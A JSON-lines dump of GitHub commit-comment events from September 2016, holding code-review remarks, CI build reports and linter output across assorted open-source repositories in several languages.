{"id":"4603988642","type":"CommitCommentEvent","actor":{"login":"carlosdauden"},"repo":{"name":"OCA/e-commerce"},"payload":{"comment":{"id":19134157,"position":null,"line":null,"path":null,"commit_id":"0bca573af9856119209b8c34eff893b20b1c9099","created_at":"2016-09-22T17:43:11Z","updated_at":"2016-09-22T17:43:11Z","body":"Fixed in amend commit"}},"created_at":"2016-09-22T17:43:11Z"}
{"id":"4603991491","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19134162,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-22T17:43:40Z","updated_at":"2016-09-22T17:43:40Z","body":"The `new` built-in function only accepts a type as the input. Thus, `new(Node)` works since `Node` is a type. And `new(Node{Value: v})` doesn't work because `Node{Value: v}` is a type literal (i.e., it is concrete value).\r\n\r\nSimilar the first argument of `make` also only accepts a type.\r\n\r\nFor these reasons, `new` and `make` are magical in that they are impossible implement by you. They rely on features beyond what you can write with normal functions."}},"created_at":"2016-09-22T17:43:40Z"}
{"id":"4603992057","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19134163,"position":null,"line":null,"path":null,"commit_id":"84d9aed76a0f2a23b26db5f1cf9a84dd35d2739e","created_at":"2016-09-22T17:43:47Z","updated_at":"2016-09-22T17:43:47Z","body":"Indeed it may be worth a speculative try, thanks. But SEE() is a strange beast, used in move ordering but not gaining much from being more exact, even scoring illegal moves doesn't seem to hurt too much... All this is getting quite counter-intuitive to me :-( "}},"created_at":"2016-09-22T17:43:47Z"}
{"id":"4603992707","type":"CommitCommentEvent","actor":{"login":"Coande"},"repo":{"name":"Coande/LandLeg_Java"},"payload":{"comment":{"id":19134165,"position":null,"line":null,"path":null,"commit_id":"a34b9c596d91fadffeee79c22a64c9f01d353183","created_at":"2016-09-22T17:43:53Z","updated_at":"2016-09-22T17:43:53Z","body":"当前我们这里还能用，懒得折腾了。新版的你有思路吗？"}},"created_at":"2016-09-22T17:43:53Z"}
{"id":"4603994303","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19134167,"position":null,"line":null,"path":null,"commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-22T17:44:10Z","updated_at":"2016-09-22T17:44:10Z","body":"LGTM.  Let's get QA on it and ship this."}},"created_at":"2016-09-22T17:44:10Z"}
{"id":"4603995484","type":"CommitCommentEvent","actor":{"login":"nook-ru"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19134171,"position":null,"line":null,"path":null,"commit_id":"a642ad6898f9ed112fc04f9f63b3a14b645746f5","created_at":"2016-09-22T17:44:21Z","updated_at":"2016-09-22T17:44:21Z","body":"@may-cat скинул в slack"}},"created_at":"2016-09-22T17:44:21Z"}
{"id":"4603995726","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19134172,"position":25,"line":25,"path":"Home_Work_warm_up.py","commit_id":"732ad3c9feff19500baf24721d195dd58992fb25","created_at":"2016-09-22T17:44:24Z","updated_at":"2016-09-22T17:44:24Z","body":"There should be way to exit application"}},"created_at":"2016-09-22T17:44:24Z"}
{"id":"4603995844","type":"CommitCommentEvent","actor":{"login":"egranata"},"repo":{"name":"apple/swift-lldb"},"payload":{"comment":{"id":19134173,"position":null,"line":null,"path":null,"commit_id":"121a68e62aa2fb6706af243d1a74c41fc8528536","created_at":"2016-09-22T17:44:25Z","updated_at":"2016-09-22T17:44:25Z","body":"I was seeing a bunch of tests failing on my local checkout (but, admittedly, not on the build bots..); this was enough to appease LLDB into working again\r\n\r\nIf we are going to remove PolymorphicFunctionType, then we should remove it for good - but keep in mind that we already had some code dealing with those, I just added enough to complete the puzzle.."}},"created_at":"2016-09-22T17:44:25Z"}
{"id":"4603995904","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134174,"position":null,"line":null,"path":null,"commit_id":"3877cad8b823e12e67ce4fe563919adcb014dc89","created_at":"2016-09-22T17:44:25Z","updated_at":"2016-09-22T17:44:25Z","body":"Действительно, это вариант решения, хотя он отличается от \"стандартного\", когда весь текст анализируется посимвольно до каждого встреченного пробела. В любом случае, есть стандартный и Ваш алгоритмы,  которые должны давать одинаковый результат. Необходимо удостовериться, что Ваше решение дает верный результат всегда. Можно для начала просто пересчитать слова вручную. В качестве упражнения попробуйте также реализовать стандартное решение."}},"created_at":"2016-09-22T17:44:25Z"}
{"id":"4604003347","type":"CommitCommentEvent","actor":{"login":"Andrey1960"},"repo":{"name":"Andrey1960/gittest"},"payload":{"comment":{"id":19134193,"position":1,"line":1,"path":"Charlik.txt","commit_id":"20aad2946359f8281c16277baf622281c4d10ff0","created_at":"2016-09-22T17:45:45Z","updated_at":"2016-09-22T17:45:45Z","body":"Привет!Hello from GitHub!"}},"created_at":"2016-09-22T17:45:45Z"}
{"id":"4604004251","type":"CommitCommentEvent","actor":{"login":"jackkoenig"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19134198,"position":21,"line":253,"path":"src/main/scala/firrtl/passes/AnnotateValidMemConfigs.scala","commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T17:45:54Z","updated_at":"2016-09-22T17:45:54Z","body":"This one is confusing. In Firrtl, serialize should always return a String and be pure. I can't seem to find where this is used since this commit doesn't seem to be changing any calls of the function\r\n\r\nAny comments @shunshou?"}},"created_at":"2016-09-22T17:45:54Z"}
{"id":"4604007547","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19134209,"position":13,"line":13,"path":"Home_Work_1.1.py","commit_id":"732ad3c9feff19500baf24721d195dd58992fb25","created_at":"2016-09-22T17:46:30Z","updated_at":"2016-09-22T17:46:30Z","body":"using global variables is usually dubious decision. I"}},"created_at":"2016-09-22T17:46:30Z"}
{"id":"4604013854","type":"CommitCommentEvent","actor":{"login":"1coolranger"},"repo":{"name":"1coolranger/Testing-github"},"payload":{"comment":{"id":19134227,"position":2,"line":2,"path":"README.md","commit_id":"56a7eb2f855d744752dd7e8b67f8bf55463034af","created_at":"2016-09-22T17:47:38Z","updated_at":"2016-09-22T17:47:38Z","body":"Inital commit for github\r\n"}},"created_at":"2016-09-22T17:47:38Z"}
{"id":"4604014547","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"DragonFlyBSD/DeltaPorts"},"payload":{"comment":{"id":19134230,"position":28,"line":27,"path":"ports/www/firefox/dragonfly/patch-js_src_old-configure.in","commit_id":"ad0c8cb1b283275166c732fd30a941fc8eb885e3","created_at":"2016-09-22T17:47:46Z","updated_at":"2016-09-22T17:47:46Z","body":"`MOZ_MEMORY_*` actually moved to `build/moz.configure/memory.configure`."}},"created_at":"2016-09-22T17:47:46Z"}
{"id":"4604015369","type":"CommitCommentEvent","actor":{"login":"Nosmoht"},"repo":{"name":"Nosmoht/ansible-module-foreman"},"payload":{"comment":{"id":19134232,"position":5,"line":null,"path":"foreman_subnet.py","commit_id":"9ce8440d5c606c358b0f5e8ef68134a4cdf07712","created_at":"2016-09-22T17:47:54Z","updated_at":"2016-09-22T17:47:54Z","body":"Could you please add the default value to the Ansible module docu?\n"}},"created_at":"2016-09-22T17:47:54Z"}
{"id":"4604017106","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19134237,"position":13,"line":13,"path":"Home_Work_1.1.py","commit_id":"732ad3c9feff19500baf24721d195dd58992fb25","created_at":"2016-09-22T17:48:14Z","updated_at":"2016-09-22T17:48:14Z","body":"python can return several values"}},"created_at":"2016-09-22T17:48:14Z"}
{"id":"4604017152","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19134238,"position":106,"line":87,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T17:48:14Z","updated_at":"2016-09-22T17:48:14Z","body":"In effetti Aurora non ha senso perché la stringa è proprio riferita alla \nnightly.\nVedo cosa dice Francesco sulla questione build/versione e poi applico i \ntuoi suggerimenti, grazie :-)\n\n\n"}},"created_at":"2016-09-22T17:48:14Z"}
{"id":"4604021562","type":"CommitCommentEvent","actor":{"login":"jcwilk"},"repo":{"name":"gamache/hyperresource"},"payload":{"comment":{"id":19134247,"position":23,"line":20,"path":"lib/hyper_resource/modules/http.rb","commit_id":"3a2bf6951b259cd59c930908b39ed73f14b97943","created_at":"2016-09-22T17:49:04Z","updated_at":"2016-09-22T17:49:04Z","body":"@gamache - Forgive my ignorance, but why is it necessary to do this? In later revisions you've expanded on `key` but in my case it's still insufficient because I later pass in a different faraday adapter to a new instance of `HyperResource`, which ends up matching the same key since it doesn't take all the properties of the adapter into account in the key, and then it uses the old, wrong `Faraday` instance with the wrong adapter in my new `HyperResource` instance.\r\n\r\nCould we just do away with this Thread-based memoization entirely? What's the use case this is built to protect? Does faraday not have adapters that would support the use case?"}},"created_at":"2016-09-22T17:49:04Z"}
{"id":"4604022098","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"pret/poketcg"},"payload":{"comment":{"id":19134249,"position":null,"line":null,"path":null,"commit_id":"5b45422cc2cdb531c5729ff3169a2d5ea9ba3d35","created_at":"2016-09-22T17:49:10Z","updated_at":"2016-09-22T17:49:10Z","body":"Because all the other macros were lowercase, I guess, because I don't really remember"}},"created_at":"2016-09-22T17:49:10Z"}
{"id":"4604023117","type":"CommitCommentEvent","actor":{"login":"Johney16"},"repo":{"name":"Johney16/dotfiles"},"payload":{"comment":{"id":19134254,"position":null,"line":null,"path":null,"commit_id":"340ba9168e220eeafde2bf4f38fe7e99245c4f76","created_at":"2016-09-22T17:49:22Z","updated_at":"2016-09-22T17:49:22Z","body":"2\r\n"}},"created_at":"2016-09-22T17:49:22Z"}
{"id":"4604023565","type":"CommitCommentEvent","actor":{"login":"filipesilva"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19134256,"position":4,"line":3,"path":"public/docs/_examples/architecture/e2e-spec.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:49:27Z","updated_at":"2016-09-22T17:49:27Z","body":"Fixed in local commit amend."}},"created_at":"2016-09-22T17:49:27Z"}
{"id":"4604024723","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19134261,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-22T17:49:39Z","updated_at":"2016-09-22T17:49:39Z","body":"We could add it to the feed as an optional download ...\r\n... but I doubt it's used anywhere.\r\n"}},"created_at":"2016-09-22T17:49:39Z"}
{"id":"4604024830","type":"CommitCommentEvent","actor":{"login":"kkaravitis"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19134262,"position":50,"line":92,"path":"portlet-parent/wicketstuff-portlet/src/main/java/org/apache/wicket/portlet/PortletUrlRenderer.java","commit_id":"dfcd0bcf5747c82e969ff02a1a6555637c22fbd4","created_at":"2016-09-22T17:49:40Z","updated_at":"2016-09-22T17:49:40Z","body":"Please see #549"}},"created_at":"2016-09-22T17:49:40Z"}
{"id":"4604028447","type":"CommitCommentEvent","actor":{"login":"filipesilva"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19134280,"position":15,"line":77,"path":"public/docs/_examples/cb-dependency-injection/e2e-spec.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:50:18Z","updated_at":"2016-09-22T17:50:18Z","body":"Fixed"}},"created_at":"2016-09-22T17:50:18Z"}
{"id":"4604030925","type":"CommitCommentEvent","actor":{"login":"filipesilva"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19134289,"position":15,"line":60,"path":"public/docs/_examples/cb-ts-to-js/e2e-spec.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:50:45Z","updated_at":"2016-09-22T17:50:45Z","body":"Fixed"}},"created_at":"2016-09-22T17:50:45Z"}
{"id":"4604032541","type":"CommitCommentEvent","actor":{"login":"filipesilva"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19134295,"position":10,"line":6,"path":"public/docs/_examples/protractor-helpers.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:51:03Z","updated_at":"2016-09-22T17:51:03Z","body":"Fixed"}},"created_at":"2016-09-22T17:51:03Z"}
{"id":"4604033867","type":"CommitCommentEvent","actor":{"login":"nzakas"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19134299,"position":6,"line":137,"path":"lib/util/source-code.js","commit_id":"97af7d512653b231db602403cc1d590f48de87b2","created_at":"2016-09-22T17:51:17Z","updated_at":"2016-09-22T17:51:17Z","body":"Maybe prefix with an underscore to indicate it's private? `_attachedCommentStore`"}},"created_at":"2016-09-22T17:51:17Z"}
{"id":"4604034323","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19134300,"position":null,"line":null,"path":null,"commit_id":"90ed550c3f6477a6c057eba6283312f74e26bafe","created_at":"2016-09-22T17:51:22Z","updated_at":"2016-09-22T17:51:22Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T17:51:22Z"}
{"id":"4604035355","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19134303,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-22T17:51:34Z","updated_at":"2016-09-22T17:51:34Z","body":"i just find that notation in the log annoying. If it makes no difference - how about patching out that note?"}},"created_at":"2016-09-22T17:51:34Z"}
{"id":"4604036432","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19134309,"position":null,"line":null,"path":null,"commit_id":"a1722b22406de1fc587bc25e5940d4ac10f2089a","created_at":"2016-09-22T17:51:45Z","updated_at":"2016-09-22T17:51:45Z","body":"Sizing-Simple-Chilled-Ceiling (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2336 of 2339 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1722b22406de1fc587bc25e5940d4ac10f2089a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T17:51:45Z"}
{"id":"4604036636","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"Hydreon/Steadfast2"},"payload":{"comment":{"id":19134310,"position":27,"line":1982,"path":"src/pocketmine/Player.php","commit_id":"381943175badd963171584c6c4fdbfda09db239c","created_at":"2016-09-22T17:51:47Z","updated_at":"2016-09-22T17:51:47Z","body":"Heads up: typo"}},"created_at":"2016-09-22T17:51:47Z"}
{"id":"4604040019","type":"CommitCommentEvent","actor":{"login":"jackkoenig"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19134320,"position":21,"line":253,"path":"src/main/scala/firrtl/passes/AnnotateValidMemConfigs.scala","commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T17:52:24Z","updated_at":"2016-09-22T17:52:24Z","body":"I'm assuming that either sp or dp must be Some(_)? in that case this whole function could be rewritten as:\r\n\r\nsp getOrElse (dp getOrElse (throw new Exception(...)))"}},"created_at":"2016-09-22T17:52:24Z"}
{"id":"4604040578","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19134324,"position":null,"line":null,"path":null,"commit_id":"45c492aae9981250b2f408976b59c5fb95803f3a","created_at":"2016-09-22T17:52:30Z","updated_at":"2016-09-22T17:52:30Z","body":"[tests/testthat/test_convert_to_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/45c492aae9981250b2f408976b59c5fb95803f3a/tests/testthat/test_convert_to_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_to_otu_table.R:26:2:](https://github.com/seninp-bioinfo/MetaComp/blob/45c492aae9981250b2f408976b59c5fb95803f3a/tests/testthat/test_convert_to_otu_table.R#L26) *style:* **Commented code should be removed.**\n```r\n​#expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/nonexistantfile.txt\", \"class\"), throws_error())\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_to_otu_table.R:27:1:](https://github.com/seninp-bioinfo/MetaComp/blob/45c492aae9981250b2f408976b59c5fb95803f3a/tests/testthat/test_convert_to_otu_table.R#L27) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_to_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-22T17:52:30Z"}
{"id":"4604042950","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19134332,"position":null,"line":null,"path":null,"commit_id":"317c21590640cea94179091a345b33e024a321d5","created_at":"2016-09-22T17:52:54Z","updated_at":"2016-09-22T17:52:54Z","body":"StrayDocFixes (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-317c21590640cea94179091a345b33e024a321d5-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-317c21590640cea94179091a345b33e024a321d5-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T17:52:54Z"}
{"id":"4604043172","type":"CommitCommentEvent","actor":{"login":"nzakas"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19134335,"position":18,"line":201,"path":"lib/util/source-code.js","commit_id":"97af7d512653b231db602403cc1d590f48de87b2","created_at":"2016-09-22T17:52:57Z","updated_at":"2016-09-22T17:52:57Z","body":"Maybe just define this as a helper function outside of this method? It's the same every time, no need for it to be in here."}},"created_at":"2016-09-22T17:52:57Z"}
{"id":"4604050206","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19134352,"position":4,"line":8,"path":"java/squeek/applecore/ModInfo.java","commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T17:54:13Z","updated_at":"2016-09-22T17:54:13Z","body":"The name actually should be one word (`AppleCore`), as that's what [is used elsewhere](https://github.com/squeek502/AppleCore/blob/1.10.2/resources/applecore.info#L4)"}},"created_at":"2016-09-22T17:54:13Z"}
{"id":"4604050970","type":"CommitCommentEvent","actor":{"login":"bavarija"},"repo":{"name":"Wiethoofd/WietHUD"},"payload":{"comment":{"id":19134355,"position":null,"line":null,"path":null,"commit_id":"aace336f75ecff4ea8e20992046fe5d2f874d953","created_at":"2016-09-22T17:54:21Z","updated_at":"2016-09-22T17:54:21Z","body":"aace336"}},"created_at":"2016-09-22T17:54:21Z"}
{"id":"4604051582","type":"CommitCommentEvent","actor":{"login":"chirag04"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19134358,"position":14,"line":43,"path":"Libraries/Experimental/SwipeableRow/SwipeableListView.js","commit_id":"5c13eaccbd7136949525b6c6eb3ac7e0c63c662f","created_at":"2016-09-22T17:54:26Z","updated_at":"2016-09-22T17:54:26Z","body":"@fred2028 do we need this? Seems like this is never set to false and we can just remove it. we directly set the native prop(setNativeProps) on the listview to false.  Not sure if i'm missing anything."}},"created_at":"2016-09-22T17:54:26Z"}
{"id":"4604052912","type":"CommitCommentEvent","actor":{"login":"dl1jbe"},"repo":{"name":"airween/tlf"},"payload":{"comment":{"id":19134364,"position":null,"line":null,"path":null,"commit_id":"f7eebdd362a12afd7b71c7d07f669247e8cbbb0c","created_at":"2016-09-22T17:54:42Z","updated_at":"2016-09-22T17:54:42Z","body":"Dropped the showscore_flag = 0; at the begin of function. Please have a look at the master branch.\r\nIt was there from the old screen layout before the new bandmap. At that time the score window and the cluster window shared the same space - so the score window got switched off to not interfere with the cluster. \r\nThanks for pointing it out Ervin. Good catch."}},"created_at":"2016-09-22T17:54:42Z"}
{"id":"4604053529","type":"CommitCommentEvent","actor":{"login":"Chupo22"},"repo":{"name":"Chupo22/diplom"},"payload":{"comment":{"id":19134368,"position":12,"line":12,"path":"local/classes/learningdatabase/orm/exercisetable.php","commit_id":"d165dfca8832a0160065735a267f265b35643e54","created_at":"2016-09-22T17:54:49Z","updated_at":"2016-09-22T17:54:49Z","body":"test"}},"created_at":"2016-09-22T17:54:49Z"}
{"id":"4604053555","type":"CommitCommentEvent","actor":{"login":"nzakas"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19134369,"position":27,"line":210,"path":"lib/util/source-code.js","commit_id":"97af7d512653b231db602403cc1d590f48de87b2","created_at":"2016-09-22T17:54:49Z","updated_at":"2016-09-22T17:54:49Z","body":"Also `SwitchStatement` if `cases.length === 0`."}},"created_at":"2016-09-22T17:54:49Z"}
{"id":"4604055412","type":"CommitCommentEvent","actor":{"login":"lamkeewei"},"repo":{"name":"Planeshifter/isle-editor"},"payload":{"comment":{"id":19134377,"position":null,"line":null,"path":null,"commit_id":"460c0dbbce38fb66df8e84b65e800039ee4c8f44","created_at":"2016-09-22T17:55:10Z","updated_at":"2016-09-22T17:55:10Z","body":"Example of what it should look like. Let me know if you need fixes for this. \r\n\r\n![image](https://cloud.githubusercontent.com/assets/3666479/18759776/1fc8cf7c-80cc-11e6-9470-267c087fd6cf.png)\r\n"}},"created_at":"2016-09-22T17:55:10Z"}
{"id":"4604056651","type":"CommitCommentEvent","actor":{"login":"nzakas"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19134380,"position":49,"line":221,"path":"lib/util/source-code.js","commit_id":"97af7d512653b231db602403cc1d590f48de87b2","created_at":"2016-09-22T17:55:22Z","updated_at":"2016-09-22T17:55:22Z","body":"Same, I'd move this out into a helper function."}},"created_at":"2016-09-22T17:55:22Z"}
{"id":"4604059422","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19134390,"position":null,"line":null,"path":null,"commit_id":"732ad3c9feff19500baf24721d195dd58992fb25","created_at":"2016-09-22T17:55:53Z","updated_at":"2016-09-22T17:55:53Z","body":"looks good to me. \r\n"}},"created_at":"2016-09-22T17:55:53Z"}
{"id":"4604060942","type":"CommitCommentEvent","actor":{"login":"hnlee"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19134392,"position":25,"line":82,"path":"test/httpserver/operator_test.clj","commit_id":"de04f5b60c69965f4f8f3c4e712eaab80c1da318","created_at":"2016-09-22T17:56:06Z","updated_at":"2016-09-22T17:56:06Z","body":"Yes, if you GET request a valid URI that is percent-encoded, the spec says it should be the same behavior as just requesting the URI written in ASCII, but without the decode-uri call, the server will return a 404."}},"created_at":"2016-09-22T17:56:06Z"}
{"id":"4604062957","type":"CommitCommentEvent","actor":{"login":"nzakas"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19134396,"position":52,"line":224,"path":"lib/util/source-code.js","commit_id":"97af7d512653b231db602403cc1d590f48de87b2","created_at":"2016-09-22T17:56:27Z","updated_at":"2016-09-22T17:56:27Z","body":"I'm not entirely clear on why punctuators matter here. Can you add a comment?"}},"created_at":"2016-09-22T17:56:27Z"}
{"id":"4604068633","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19134414,"position":41,"line":18,"path":"scripts/landing.js","commit_id":"0df375ee93be582978562d3623b65f83bcfe7d22","created_at":"2016-09-22T17:57:26Z","updated_at":"2016-09-22T17:57:26Z","body":"new line :)"}},"created_at":"2016-09-22T17:57:26Z"}
{"id":"4604070745","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":19134425,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-22T17:57:51Z","updated_at":"2016-09-22T17:57:51Z","body":"Interesting.  I put some simple debugging in and it looks like the src & dst IP addresses get swapped when doing the ingress tuple/conntrack lookup.  This isn't a problem with say triple isolate, but dual-dsthost on an ingress ifb bases it's decisions on the source (internet) IP address and not the internal destination host.\r\n\r\nYou clearly understand conntrack much, much better than me, I'm not sure if 'reply/reverse' tuple needs to be looked up, and/or it needs to be the src tuple rather than dst.  I'm confused :-)\r\n\r\nthe simple debug was:\r\nprintk ( KERN_NOTICE \"O%pI4 S%pI4 D%pI4\", &keys->addrs.v4addrs.dst, &tuple->src.u3.ip, &tuple->dst.u3.ip );\r\n                                keys->addrs.v4addrs.dst = tuple->dst.u3.ip;"}},"created_at":"2016-09-22T17:57:51Z"}
{"id":"4604072485","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19134432,"position":30,"line":7,"path":"scripts/landing.js","commit_id":"0df375ee93be582978562d3623b65f83bcfe7d22","created_at":"2016-09-22T17:58:11Z","updated_at":"2016-09-22T17:58:11Z","body":"you should not be declaring a function inside a for loop. "}},"created_at":"2016-09-22T17:58:11Z"}
{"id":"4604074389","type":"CommitCommentEvent","actor":{"login":"sannzay"},"repo":{"name":"sannzay/hello-world"},"payload":{"comment":{"id":19134435,"position":null,"line":null,"path":null,"commit_id":"ef396fd3ef527d2bd3da422584c06c713820b4a2","created_at":"2016-09-22T17:58:32Z","updated_at":"2016-09-22T17:58:32Z","body":"just simply"}},"created_at":"2016-09-22T17:58:32Z"}
{"id":"4604076064","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19134442,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-22T17:58:50Z","updated_at":"2016-09-22T17:58:50Z","body":"Well, if it makes you happy, I'll have a look at the package :)"}},"created_at":"2016-09-22T17:58:50Z"}
{"id":"4604076942","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19134446,"position":10,"line":43,"path":"styles/landing.css","commit_id":"0df375ee93be582978562d3623b65f83bcfe7d22","created_at":"2016-09-22T17:58:59Z","updated_at":"2016-09-22T17:58:59Z","body":"you should have changed this to other types of transitions, not just changed the duration"}},"created_at":"2016-09-22T17:58:59Z"}
